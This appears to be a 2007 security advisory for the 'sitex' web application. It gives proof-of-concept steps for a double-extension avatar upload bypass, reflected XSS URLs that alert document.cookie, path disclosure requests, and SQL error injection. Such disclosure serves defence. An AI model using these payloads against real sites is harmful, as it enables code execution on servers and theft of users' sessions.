sitex multiple vulnerabilities

2007-03-08 / 2007-03-09

Credit: none

Risk: High

Local: No

Remote: Yes

CVE: CVE-2007-1237 | CVE-2007-1236 | CVE-2007-1235 | CVE-2007-1234

CWE: N/A

global risk:critical
upload vulnerability:
in user profile upload an avatar with a double extension like :
file.php.jpg
once it's done,you gone get an error like:Fatal error: Call to undefined function imagedestroy() in /.
but the last extension (jpg) will be removed by the script, and stored in :
/content/avatars
has ramdom_numberfile.php
xss get :
/sitex/calendar.php?sxMonth=1&sxYear='"><script>alert(document.cookie)</
script>
/sitex/search.php?search=<script>alert(document.cookie)</script>
xss via mysql error:
/sitex/redirect.php?linkid='</textarea>'"><script>alert(document.cookie)
</script>
/calendar_events.php?page='"><script>alert(document.cookie)</script>
full path disclosure:
/sitex/calendar.php?sxMonth[]=1
/sitex/calendar.php?sxMonth=1&sxYear[]=2007
/calendar_events.php?page[]=1
multiples errors sql :
just add a ' on any var ..
or on any fields ( like in forum,search,...etc )
regards laurent gaffi

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

sitex multiple vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.